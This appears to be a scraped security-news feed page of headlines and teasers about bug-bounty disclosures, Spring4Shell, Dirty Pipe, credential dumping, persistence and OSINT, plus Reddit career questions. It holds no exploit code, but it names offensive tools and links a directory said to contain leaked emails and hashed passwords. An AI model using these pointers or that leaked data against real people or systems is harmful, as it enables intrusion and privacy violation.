    Під “мережевою розвідкою” розуміється збір інформації про домен з відкритих джерел, себто Open Source Intelligence (OSINT). У цій статті я… Continue reading on KR. LABORATORIES IT BLOG »
    Утиліти консолі Linux для мережевої розвідки доменів
    Під “мережевою розвідкою” розуміється збір інформації про домен з відкритих джерел, себто Open Source Intelligence (OSINT). У цій статті я… Continue reading on Medium »
    War in Ukraine / April 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Logging information about users through news
    Let’s talk about masking logged links using the https://telegra.ph/ Continue reading on Medium »
    Virtual OSINT labs…
    Small topic. But without it, you just can’t. Virtual OSINT labs that will be useful for security researchers as well. Choose your…… Continue reading on Medium »
  • Open

    Exposed Golang Pprof debugger at https://cn-geo1.uber.com/
    Uber disclosed a bug submitted by boobalan123: https://hackerone.com/reports/1385906 - Bounty: $500
    Chain of IDORs Between U4B and Vouchers APIs Allows Attackers to View and Modify Program/Voucher Policies and to Obtain Organization Employees' PII
    Uber disclosed a bug submitted by hunt4p1zza: https://hackerone.com/reports/1148697 - Bounty: $10250
    Reflected XSS on []
    U.S. Dept Of Defense disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1267380
    [www.] Path-based reflected Cross Site Scripting
    U.S. Dept Of Defense disclosed a bug submitted by geeknik: https://hackerone.com/reports/1159371
    [CVE-2020-3452] on
    U.S. Dept Of Defense disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1234925
    username and password leaked via pptx for website
    U.S. Dept Of Defense disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1512199
    Broken access control, can lead to legitimate user data loss
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1493007
    Authorization bypass -> IDOR -> PII Leakage
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489470
    Cross-site Scripting (XSS) - Reflected at https:///
    U.S. Dept Of Defense disclosed a bug submitted by mamunwhh: https://hackerone.com/reports/1370746
    SQL Injection in
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489744
    XSS on https:///' parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252020
    XSS on https:/// parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252229
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252059
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1251868
    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317031
    Bypassing CORS Misconfiguration Leads to Sensitive Exposure at https:///
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1092125
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223575
    Uninstalling Rockstar Games Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Rockstar Games disclosed a bug submitted by toxiqcitee: https://hackerone.com/reports/1278261 - Bounty: $250
  • Open

    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
  • Open

    vulnerabilityMultiple vulnerability leading to account takeover in TikTok SMB subdomain.
    I’m here to tell you how I account takeover in TikTok I submitted this bug in HackerOne and I got 1000$ for this bug Continue reading on Medium »
    SuperBots Bug Bounty is here! Win up to $25,000!
    Continue reading on Medium »
    DonPAPI — Dumping DPAPI Credz Remotely
    Dumping revelant information on compromised targets without AV detection  DPAPI dumping Continue reading on Medium »
    Personal Security Checklist
    A curated checklist of tips to protect your digital security and privacy Continue reading on Medium »
    Recon tool for bug bounty
    Layla is a python script that automatically performs recon on a given URL. It combines the outputs of other known tools into a single one. Continue reading on Medium »
    scarce-apache2-a-framework-for-bug-hunting-or-pentesting-targeting-websites-that-have-cve-2021–41773…
    This tool can scan websites with CVE-2021–41773 Vulnerability that are affecting Apache2 Webserver, ScaRCE can run too for executing… Continue reading on Medium »
    Web-Hacking-Toolkit — A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User…
    A multi-platform web hacking toolkit Docker image with Graphical User Interface (GUI) support. Installation Continue reading on Medium »
  • Open

    Hunting Secrets from Containers by Analysing Docker Images
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Looking for advice on my next SANS course.
    Company is buying... I'm in Incident Response (3 years). Passed my 508 last year and now I have the opportunity to take another course. I have been tossing around the idea of moving from IR to a different area like detection engineering, hunting/intel or attempting to move to a dedicated Purple Team full time. Would taking FOR578 be the best step forward as far as flexibility in career advancements go? Maybe something else? submitted by /u/SlowBoatToHades [link] [comments]
    Getting back on track after a long break
    Hi guys, I'm a cybersec engineer that had some kind of break from security (I learnt lots of web development for the last 6 months or so) and well I really got out of shape. Now, I would like to get back on track and I was looking for resources / advice on how to do this better if any of you want to share. I really appreciate the help! submitted by /u/GeologistLegitimate6 [link] [comments]
    Been studying for OSCP for 250+ hours and i'm starting to doubt it's relevance to real pentesting. Looking for guidance
    Some background on me: I used to be a programmer (2.5 years) Quit my job to pursue my passion, offensive cyber security OSCP seemed like a great option for someone who hates written exams like me and loved the brutal nature of a 24 hour skill based exam been documenting my noob to OSCP journey on youtube, week by week: https://youtube.com/playlist?list=PLSGxDsVUZ-zzB4DzUb4b2lfihBFgj53eU The OSCP exam is a network penetration testing exam, strictly. There is little to no web exploitation. I was having a talk with a friend of mine on a CTF team I joined and he mentioned that network penetration testing is less relevant than it was in the past. Now, the OSCP does cover active directory and basic buffer overflow, which seems nice to know for sure. However the initial foothold often relies on heavily out of date software (think: 2006) for which an RCE exploit is readily available on exploit-db. Having worked as a developer for a few years, yeah i can confirm everything we do is based on web apps. Everything. Especially with work from home, i mean sometimes in companies that utilize remote work heavily there is no "domain controller". Just a bunch of devs collaborating on github or bitbucket. I'd say i'm about 250 more hours away from being OSCP ready (half way there) and i think that time would be better served on hackthebox, hackerone, and doing CTF's with my team. Given what i know about the OSCP i don't believe these things will help much with passing the exam even though they would make me a better professional. It's really one or the other. TLDR: Penetration testers, security engineers, etc: how important is network penetration to your job functions? (AKA, how relevant is OSCP?) Thanks in advance for your guidance. submitted by /u/NSP781 [link] [comments]
    I feel like i am wasting my time .
    Hi,24 [M] basically I was in computer engineering school 4 years ago. But it was shit,the exams were literally copy paste from past exams and people didn’t study they just memorised. I had anxiety during exams and could never think with a clear head,i was very depressed,and i failed 3 semester straight with all F’s . So i transferred to MIS school,business informatics. I took programming courses,basic networks,and basic hardware,and introduction to information security course . But i self studied many concepts in computer science like ML,web,game dev,and finally security. Right now I am doing an internship as a technical support, i am learning about Sophos firewall and later will learn about Azure and cloud security. I am ‘Script kiddie’ on hackthebox but i am getting better, i consider m…
    GAQM CISP good next step?
    Hi everyone going to do my security + soon wondering if CISP from GAQM is a good next step after sec+. when ever i try to find info on it the search is over run by CISSP which is a more challenging certification. submitted by /u/Namibguy [link] [comments]
    Looking for cybersecurity or digital privacy ideas / topics for my undergraduate degree
    Hi, I'm in the planning phase of my bachelors degree in information technology. I want to write about either cybersecurity and / or digital privacy. I have two main ideas currently: To set up a / or several honeypot services (WordPress sites, E-commerce website and or incomplete web apps) and collect the data running through them from bots and hopefully unsuspecting bad actors. To create a browser add-on or web app to visualize, in 3D (webgl), the trackers that are currently tracking you on a website. Any comments on the above mentioned topics, or any other interesting topics regarding: cybersecurity, digital privacy, big brother society and / or cryptography would be highly appreciated. submitted by /u/krullmizter [link] [comments]
    Netskope - Accidental install on personal PC, What can be seen?
    I am a consultant and work with many companies. One incorrectly pegged me as an FTE and sent an urgent email to download Netskope to access their data. I downloaded it and opened but didn't realize it actually installed anything. Got some text box that I thought was an error. Later that day found out it was not necessary for me to have Netskope. Today, I tried to access a website blocked by the company's acceptable use policy and found out that Netskope was in fact installed and has been active for a couple of weeks. I uninstalled it and have been able to access all websites again. Questions: 1) what exactly can a tool like this see? I assume my web browsing history which is whatever, but can it see what Google Analytics data or otherwise I accessed for my other clients? What if I didn't download anything? Can it see my Google Drive documents not related to the specific company email? Can it see all of my passwords? 2) is it worthwhile to ask the client company to delete my data? 3) i uninstalled it which stopped it from blocking my access to websites. Is this enough or should I hard reset my entire computer? submitted by /u/phillytrees [link] [comments]
  • Open

    SecWiki News 2022-04-07 Review
    APT取证分析中的数据压缩 by ourren 元宇宙与国家数据安全:构建生态化治理体系的挑战与趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-07 Review
    APT取证分析中的数据压缩 by ourren 元宇宙与国家数据安全:构建生态化治理体系的挑战与趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    Mental Models
    This page contains my collection of mental models I use for decision-making, business, and life in general. Some models are more practical and, as such, can be applied to everyday situations. Others can be used for long-term decisions or to enjoy in a thought process. Keep in mind that one should never be stuck thinking with common frameworks like the ones provided here. You should use your judgment and adjust to your situations. It is also essential to understand that these mental models are meaningless unless you internalize them. Further reading and practice are required. Circle of competence Focus on what you know. Double down on your strengths, and do not obsess about your weaknesses. For example, Einstein might not be the best pick for a basketball team, but that does not mean he is …
  • Open

    Getting more information about IP hosted by AWS
    I am trying to prove that a phishing email that I received was sent from the IT department at my institution as a way to help people "learn" not to click on links from unknown senders. The email header traces back to an IP at AWS. I know very little about tools and resources to dig further into the real source of a message like this. Is it possible, and if so, can anyone suggest some tools that I should look in to? submitted by /u/sudomakemetacos [link] [comments]
  • Open

    Log Injection
    🔍 Introduction Log Injection은 사용자 입력이 로그에 포함되는 경우 공격자가 이를 이용해 로그 항목을 위조하거나 악성 내용을 로그에 삽입할 수 있습니다. 🗡 Offensive techniques Detect WhiteBox 소스코드 또는 로그를 확인할 수 있는 경우 식별하기 쉽습니다. 에러 로그에서 사용자의 입력 값을 포함하여 로깅하는 경우 해당 취약점의 영향을 받습니다. 코드레벨: 각 언어에서 로그를 작성하는 부분 중 사용자 입력이 존재하는지 체크 로그레벨: 실제로 웹 요청을 통해 에러를 유도하고, 기록되는 로그를 체크 언어 별 취약한 코드는 Vulncat에 정리되어 있으니 해당 문서를 참고해주세요.
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    从 dotnet 源码看文件上传绕 waf
    作者:Y4er 原文链接:https://y4er.com/post/fileupload-bypass-with-dotnet/ 前言 看了赛博群的《从commons-fileupload源码看文件上传绕waf》,文末提到了dotnet也有这种问题,于是看了下dotnet的源码。 环境 public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    从 dotnet 源码看文件上传绕 waf
    作者:Y4er 原文链接:https://y4er.com/post/fileupload-bypass-with-dotnet/ 前言 看了赛博群的《从commons-fileupload源码看文件上传绕waf》,文末提到了dotnet也有这种问题,于是看了下dotnet的源码。 环境 public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    Spring Framework RCE (CVE-2022-22965) NMAP (NSE) Checker (Non-Intrusive)
    Article URL: https://github.com/alt3kx/CVE-2022-22965 Comments URL: https://news.ycombinator.com/item?id=30941327 Points: 1 # Comments: 0

  • Open

    FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
    submitted by /u/dmchell [link] [comments]
  • Open

    Ok so how do I know for sure if my iPhone is hacked?
    Any suggestions? submitted by /u/Unlucky_Cut_2534 [link] [comments]
    Easy and basic tls mitm proxy?
    I wish to look into some application traffic that is transported over tls, I found this proxy https://docs.mitmproxy.org/stable/concepts-howmitmproxyworks/ Do any of you have experience with this or other solutions you would recommend? submitted by /u/koera [link] [comments]
    Subdomain MX records
    Are there any security implications to consider when adding an mx record to a subdomain that points to a trusted 3rd party vendor? submitted by /u/mtx4gk [link] [comments]
    Pen Testing
    Who from IT Security would be tasked with sourcing a vendor for pen testing? What would be their job title? submitted by /u/bluesail1021 [link] [comments]
    Podcast idea
    I was thinking about a way to spend my extra time and I thought of an idea of starting a podcast to interview cyber professionals about how they got into cyber and hear their stories. Ive never podcasted before but I imagine it would be casual conversation with some standard conversations strictly focused on their careers. I don't know if anything like this is already out there but I could see this serving a need because I constantly see people posting things like " how do I get into cyber" etc. I was thinking about having diversity in people and jobs where you have you traditional technical jobs but also pivot into the none technical roles like GRC, sales, project MGMT, etc that still have a need in the field. I guess I'm looking for some feedback...on a surface level, would this be something of interest for you? submitted by /u/gnomeparadox [link] [comments]
  • Open

    Ukraine — Point de situation au 7 avril
    Les dernières 24h Continue reading on Medium »
    The Academy of the Ministry of Internal Affairs of Russia will prepare manuals for the fight…
    “Based on an application from the Investigation Department of the Ministry of Internal Affairs of Russia, we are developing methodological… Continue reading on Medium »
    War in Ukraine / April 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    How to set the approximate location of a person using the Yandex search engine?
    It’s no secret that search engines collect information about their users. But this allows us to determine the location of your target by… Continue reading on Medium »
    Ukraine — Point de situation au 6 avril
    Les dernières 24h Continue reading on Medium »
  • Open

    Hacker Interview #2: Alvin “Steiner254”
    Learning cybersecurity comes in many forms: technical practice, lab workshops, and also writeups. Bug bounty hunter Alvin, going by the… Continue reading on HackenProof »
    What is SQL Injection?
    What is It? Continue reading on Medium »
    How i got access to 1600k Users PII Data $$$$
    Hello Guys 👋 I am Gokul, Python developer, Cyber security researcher, Part time Bug hunter and Open source tool maker, Studying 3rd year… Continue reading on Medium »
    [NEW EVENT] BUG HUNTING BOUNTY IN STMAN TESTNET
    Dear Stickmen, you must be all very excited to experience the Testnet version to be released today. To celebrate this event and create the… Continue reading on Medium »
    Top 5 Geeky Websites 2022
    Hi everyone, hope you doing great. So today I’ll introduce you to five amazing websites which can be very helpful for everyone and I… Continue reading on Medium »
    Watch out the links : Account takeover
    This is my second writeup here :), Hope you find enjoy it too! Continue reading on Medium »
  • Open

    Ghostwriter v2.3.0 & 2022 Road Map
    Ghostwriter is changing! We have a new release candidate and a GraphQL API open for feedback. Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-04-06 Review
    Netgear R8300栈溢出漏洞分析 by chamd5 无人机MAVLINK协议安全剖析 by chamd5 MITRE ATT&CK 第四轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-06 Review
    Netgear R8300栈溢出漏洞分析 by chamd5 无人机MAVLINK协议安全剖析 by chamd5 MITRE ATT&CK 第四轮评估结果发布 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Validate AWS CloudFormation templates for security misconfigurations and vulnerabilities (online tool)
    submitted by /u/elitistAlmond [link] [comments]
    Dirty Pipe Explained - CVE-2022-0847
    submitted by /u/freakwin [link] [comments]
    RedFat: A Binary Hardening System for Linux/ELF/x64
    submitted by /u/zoomT [link] [comments]
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    FreeBuf 早报 | Twitter 限制俄罗斯政府账号;英特尔关闭了在俄罗斯的所有业务
    Twitter 限制了来自 300 多个俄罗斯政府官方账号的内容,其中包括俄罗斯总统普京的账号。
    乌克兰 CERT-UA警告,俄相关Armageddon APT组织正攻击乌克兰国家机构
    近日,乌克兰 CERT-UA 应急响应小组发布了一份安全报告,提醒国内组织机构警惕俄罗斯相关的网络间谍组织Armageddon APT。
    Gartner:六个步骤制定云战略
    2022 年,企业机构的创新技术不断迸发,势必会凭借新的技术,优化云部署方案。
    【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
    俄语黑客论坛出现新型窃密木马BlackGuard,售价每月200美元
    研究人员发现了 BlackGuard 在黑客论坛提供恶意软件即服务。
    俄乌冲突中蠢蠢欲动的多个APT组织
    一个月前,俄乌冲突搅动全球,世界各地的 APT 组织也以相关话题作为诱饵展开攻击。
    德国关闭了全球最大暗网市场 Hydra
    德国关闭全球最大的暗网市场 Hydra,并没收 2500 万美元。
    零售商The Works在遭遇网络攻击后被迫关闭商店
    英国领先的商业街零售商The Works在遭受网络攻击后被迫关闭了部分门店,并暂停了其部分业务。
    微软在其云服务中检测到 Spring4Shell 攻击
    微软表示,自该漏洞出现以来,就监测到了利用云服务中Spring Cloud 和 Spring Core 漏洞进行的持续性攻击。
  • Open

    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
  • Open

    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    作者:麦兜 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 一、前置知识 1....
    Chrome Mojo 组件的沙箱逃逸漏洞分析
    作者:天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,...
  • Open

    Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考
    作者:麦兜 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 一、前置知识 1....
    Chrome Mojo 组件的沙箱逃逸漏洞分析
    作者:天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,...
  • Open

    Attacker shall recieve order updates on whatsapp for users who have activated whatsapp notification
    Zomato disclosed a bug submitted by schutzx0r: https://hackerone.com/reports/1523584 - Bounty: $300
  • Open

    Anyone got an extra sans GCFA practice test?
    PM me. Much appreciated submitted by /u/CrazyKitty2016 [link] [comments]

  • Open

    Telegram OSINT: Generating a data ‘backbone’ for investigation
    With Telegram growing ever more popular, vast amounts of data are being generated which we can use to map trends and fuel investigations… Continue reading on Medium »
    ElasticSearch’i kullanarak açık veritabanları nasıl bulunur
    shodan ile neler yapabiliriz Continue reading on Medium »
    OSINT Dojo: Sakura
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques to identify a number of identifiers and other pieces of… Continue reading on InfoSec Write-ups »
    War in Ukraine / April 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools for internet anonymity and in case of internet blockage (Part 2).
    VPN for mobile devices: Continue reading on Medium »
    Bigdata analysis and eDiscovery
    ICIJ Datashare — an eDiscovery tool that allows you to quickly and easily index and search multiple documents. And, according to the user… Continue reading on Medium »
    Deep web OSINT
    OSINT (Open Source Intelligence) is widely used in our community..and mostly free. Continue reading on Medium »
    TryHackMe: Subdomain Enumeration Writeup
    This room aims to teach the various ways of discovering subdomains to expand your attack surface of a target. We will learn about 3… Continue reading on Medium »
  • Open

    /r/netsec's Q2 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    CVE-2022-25372: Local Privilege Escalation in Pritunl VPN Client
    submitted by /u/hackers_and_builders [link] [comments]
    House of Heap Exploitation Dojo — CanSecWest 2022 Registration
    submitted by /u/mdulin2 [link] [comments]
    Wordle for CVEs!
    submitted by /u/benzies [link] [comments]
    Kepler: open source CVE Search Engine written in Rust
    submitted by /u/bndt00 [link] [comments]
    Shielder - A Sneak Peek into Smart Contracts Reversing and Emulation
    submitted by /u/smaury [link] [comments]
    CVE Markdown Charts - Your InfoSec reports will now write themselves...
    submitted by /u/onlinereadme [link] [comments]
    Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers. Interestingly, the app establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as Turla.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    An OD with all the photos of r/place
    The OD contains snapshots taken roughly every 30 seconds. https://rplace.space/combined/1649112455.png is the last photo before white became the only option. https://rplace.space/combined/ submitted by /u/PhlegethonAcheron [link] [comments]
    Screenshots of r/place. Taken every 30 seconds.
    submitted by /u/bigfootsocks [link] [comments]
    Can someone help me identify what I'm looking at? I'm afraid I've found something.
    Hello - honestly not sure what I'm looking at and found this oddly niche sub after my post was removed on NoStupidQuestions. I seem to have found some sort of directory with tons of files - some seeming to contain txt files called "indian embassy" or "xbox live leak" These files contain email addresses, and a hashed password as well as some other pieces of info. Am I looking at something harmless or have I found something nefarious? Here is a link to the directory. Please open a text file and tell me if I need to report to authorities or something? http://mirrors.xieke.org/Sec/ submitted by /u/Dgb_iii [link] [comments]
    Anyone know of an app or anything to more easily brows ODs on mobile? I’m constantly tapping to zoom in and browse- it’s a bit maddening. TIA!
    submitted by /u/platynom [link] [comments]
  • Open

    House of Heap Exploitation Training - CanSecWest 2022
    Heap exploitation serves as a huge wall on the binary exploitation journey. As a result, we have created a training for breaking through this wall. This training has been taught at DEFCON, ToorCon and to several private companies in the past. In this two day training, we will go over how the glibc malloc allocator works, a variety of heap specific vulnerability classes and demonstrate how to pwn the heap in a myriad of ways including the breaking of the allocator itself and living off the land with the program being targeted. To end the training, there is a HTTP server with realistic vulnerabilities. In the final section, we will create a full exploit chain with an info leak to break ASLR/PIE and getting code execution with a separate use after free. This section includes hands on exploit development with people helping you with the complex process of heap grooming, planning and exploiting. Feel free to reach out if you have any questions. Link to the training: https://www.register.cansecwest.com/csw22/heapexploitdojo submitted by /u/mdulin2 [link] [comments]
  • Open

    DISTRIBUTED VERIFICATION OF SSL CERTIFICATES
    Continue reading on Medium »
    Komodo Consulting — Best Black Box Pen Testing, Penetration Testing Service Provider
    Studies reveal that many web applications have medium- and high-risk security flaws. Also, it is easy to identify and exploit the… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Process Injection via Component Object Model (COM) IRundown::DoCallback() @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Threat Modeling
    🚧 저도 공부중인 부분이 많아서 잘못되거나 이상한 부분이 있을 수 있습니다. 이 글을 신뢰하진 마시고, 혹시나 잘못된 부분이 있을 경우 댓글로 알려주시면 정말 감사하겠습니다 :D 🔍 Introduction Threat modeling은 가치 있는 무언가를 보호하기 위해 위협과 완화 방안을 식별하고, 쉽게 이해할 수 있도록 표현합니다. Application, System, Service 등에서 보안에 영향을 끼칠 수 있는 모든 정보를 구조화하여 표현하고 이를 기반으로 보안적인 문제를 식별하는 방법론입니다. 저는 크게 아래와 같은 플로우로 정리할까 합니다.
    Spring4Shell RCE 취약점 (CVE-2022-22965)
    지난 주 Spring4Shell 취약점으로 인해 인터넷이 또 불탈 뻔 했습니다. 다행히 Log4Shell 보단 재현하기 어렵다는 문제로 무난하게 지나갔는데요. 겸사겸사 좀 늦었지만 이슈 정리해서 글로 올려볼까 합니다. Spring4Shell JDK 9버전 이상의 Spring Core에서 RCE(Remote Code Execution)이 가능한 취약점입니다. 공개 당시 0-day 상태였고, 이후 CVE-2022-22965 할당 및 패치가 공개되었습니다. 별거 아니다, 심각한거다 이야기가 많았는데 결국 CVSS 9.8을 받았네요. 문제점 JDK 9+에서 Spring MVC나 Spring WebFlux가 구동중이고, Endpoint에 Data binder가 enabled 된 경우에 Request에 포함된 공격코드를 Binding 하면서 공격자가 의도한 로직이 실행됩니다.
  • Open

    Making SMB Accessible with NTLMquic
    This week, I dusted off my reading list and saw that I’d previously bookmarked an interesting article about the introduction of SMB over QUIC. The article from Microsoft showed that Windows was including support for SMB to be used over the QUIC protocol, which should immediately spark interest for anyone who includes SMB attacks as... The post Making SMB Accessible with NTLMquic appeared first on TrustedSec.
  • Open

    Career changer. Any advice?
    Hi all - I have 3.5 years of a BS in Biology I couldn't graduate from because I had to take care of some medical affairs. I worked in medicine in many clinical roles for 7 or 8 years. So much BS in the health field had me running the other way. I found a job in tech sales, selling Tanium's cyber solution for almost a year. Then moved on to medical sales and have been doing that for almost 2 years now. I want to go back into cyber somehow, and am studying for Sec+. People tell me CCNA is the next most helpful cert to pick up for a job. Any advice for me in terms of job hunting? I am scared shitless I'll spend all this time getting certifications that nobody cares about. submitted by /u/verdite [link] [comments]
    Significance of image and original filename?
    I am currently playing around with Sysmon on Windows, and can't really wrap my head around the significance of the "Image" and "OriginalFileName" fields. From what I understand, the image is a read-only copy of the executable at the time it is run (say, C:\Windows\System32\cmd.exe). The original file name is part of the PE header (and thus, if signed, it is protected by the signature). Say an attacker sends you cmd.exe and renames it to outlook.exe, the original file name will still be cmd.exe - the attacker cannot change this without invalidating Microsoft's signature. My question is, from a defenders perspective, should a mismatch between image and original file name always be an immediate red flag, or are there legit use cases where the two can differ? submitted by /u/usair903 [link] [comments]
  • Open

    Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks
    Article URL: https://arstechnica.com/information-technology/2022/04/zyxel-patches-critical-vulnerability-that-can-allow-firewall-and-vpn-hijacks/ Comments URL: https://news.ycombinator.com/item?id=30918099 Points: 2 # Comments: 0
    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    DirtyPipe for Android
    Dirty Pipe (CVE-2022–0847) temporary root PoC for Android. Dirty Pipe root exploit for Android (Pixel 6) Targets Continue reading on Medium »
    Bug Bounty: How to get private invites
    Now I know that a lot of people will not like this answer and you certainly do not have to follow this method if you don’t wish to. Continue reading on Medium »
    CVE-2022–21907
